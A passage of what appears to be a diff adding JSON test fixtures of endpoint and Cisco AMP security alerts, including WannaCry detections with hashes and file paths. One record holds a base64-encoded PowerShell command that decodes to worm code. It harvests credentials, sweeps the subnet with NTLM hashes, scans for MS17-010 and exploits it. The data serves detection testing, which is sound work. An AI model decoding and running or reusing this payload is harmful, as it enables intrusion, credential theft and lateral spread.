GkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==","parent_app":"WmiPrvSE.exe","parent_app_path":"C:\\Windows\\System32\\wbem","parent_pid":2236,"parent_puid":132461352663910600,"parent_user":"SYSTEM","parent_user_sid":"010100000000000512000000","pid":10724,"puid":132465072105597400,"ts":1602033881727175700,"user":"user@testdomain.com","user_sid":"010100000000000512000000"}}],"limited":false,"matched":1},"schema":"endpoint","schema_epoch":2,"sig_id":20190517123456,"sig_rev":5},"detection":"apde:20190517123456","end_ts":1610640884,"engine":"apde","id":"d2616Ab846","name":"WMIPRVSE Launched Encoded Powershell Command","observables":{"file":[{"md5":"a575a7610e5f003cc36df39e07c4ba7d","name":"powershell.exe","path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"88e7cdc0b75364418e11b2c53f772085f1b61d1e","sha256":"006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218","size":443392,"type_id":1},{"md5":"d683c112190f4b4c6d477d693ee88e35","name":"WmiPrvSE.exe","path":"C:\\Windows\\System32\\wbem","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"67858ead93feed62c0b1865369840e6e8086f53b","sha256":"385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334","size":425984,"type_id":1}]},"remediated":false,"severity":"medium","silent":false,"start_ts":1610640884,"tactics":["TA0002","TA0005","TA0008"],"type":"activity","normalized":{"observables":{"file":{"name":["powershell.exe","wmiprvse.exe"],"path":["c:\\windows\\system32\\windowspowershell\\v1.0","c:\\windows\\system32\\wbem"]}},"name":"wmiprvse launched encoded powershell command"},"ts":1610640884},"tactics":["TA0002","TA0005","TA0008"]}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":717000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419204897366867969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":686000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419179204872503298","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":686000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419229327140847665","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":639000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419204897366867977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":888000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419247189909831755","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":888000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419247189909831754","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":873000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419247189909831753","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"qeriuwjhrf","file_path":"\\\\?\\C:\\Windows\\qeriuwjhrf","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":732000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419229327140847658","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8